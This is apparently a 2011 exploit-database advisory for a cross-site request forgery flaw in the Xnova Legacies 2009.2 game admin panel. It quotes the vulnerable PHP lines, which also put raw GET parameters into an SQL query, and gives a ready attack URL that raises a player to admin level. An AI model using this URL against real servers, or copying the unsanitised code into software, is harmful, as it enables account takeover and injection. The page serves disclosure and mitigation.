header-logo
Suggest Exploit
vendor:
Xnova Legacies
by:
@xploitaday
7.5
CVSS
HIGH
Cross-Site Request Forgery (CSRF)
352
CWE
Product Name: Xnova Legacies
Affected Version From: 2009.2
Affected Version To: 2009.2
Patch Exists: NO
Related CWE: N/A
CPE: a:xnova-ng:xnova_legacies:2009.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

Xnova Legacies 2009.2 CSRF

If a moderator visits a malicious link, they can grant themselves admin privileges, allowing them to control the game. The attack URL is http://SERVER/admin/paneladmina.php?result=usr_level&player=PLAYER&authlvl=3, where SERVER and PLAYER are replaced with the appropriate values.

Mitigation:

Ensure that all user input is validated and sanitized before being used in any query or command. Implement CSRF protection tokens to verify that requests are coming from the same origin.
Source

Exploit-DB raw data:

# Exploit Title: Xnova Legacies 2009.2 CSRF
# Date: 27/1/2011
# Author: @xploitaday
# Software Homepage: http://www.xnova-ng.org/
# Software Link: http://downloads.tuxfamily.org/xnlegacies/releases/xnova-legacies_2009.2.tar.gz
# Version: 2009.2

Vuln file: admin/paneladmina.php
Vuln Lines:
108-117
				case 'usr_level':
					$Player     = $_GET['player'];
					$NewLvl     = $_GET['authlvl'];

					$QryUpdate  = doquery("UPDATE {{table}} SET `authlevel` = '".$NewLvl."' WHERE `username` = '".$Player."';", 'users');
					$Message    = $lang['adm_mess_lvl1']. " ". $Player ." ".$lang['adm_mess_lvl2'];
					$Message   .= "<font color=\"red\">".$lang['adm_usr_level'][ $NewLvl ]."</font>!";

					AdminMessage ( $Message, $lang['adm_mod_level'] );
					break;

Description:
If you are a moderator, you can set you admin.
And if an admin visit this link, you be will granted with admin privileges (control of game)

Replace SERVER and PLAYER with yours
					
Attack url: http://SERVER/admin/paneladmina.php?result=usr_level&player=PLAYER&authlvl=3